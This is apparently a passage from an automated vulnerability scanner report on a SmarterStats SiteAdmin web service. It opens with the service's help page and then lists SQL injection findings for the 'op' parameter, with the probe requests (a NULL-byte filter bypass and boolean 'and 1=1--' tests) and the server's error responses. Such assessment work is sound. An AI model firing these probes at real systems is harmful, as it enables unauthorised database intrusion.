       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetSite</h2>
<p class="intro">Returns one site listed in the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/GetSite' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetSite"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;/GetSite&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/GetSiteResult&gt;
&lt;/GetSiteResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;/GetSite&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/GetSiteResult&gt;
&lt;/GetSiteResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/GetSite?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/GetSite HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;</pre>
</span>

</span>









</body>
</html>

2.18. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The op parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the op parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Services/SiteAdmin.asmx?op=AddSite3%00' HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:33:16 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=AddSite3%00'' HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:33:16 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 2797
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>












<span>
Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.
<h2>Method Not Found</h2>
Method 'AddSite3.&#39;&#39;' was not found in service SiteAdmin.
</span>


</body>
</html>

2.19. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The op parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the op parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /Services/SiteAdmin.asmx?op=GetSiteStatus'%20and%201%3d1--%20 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:27 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
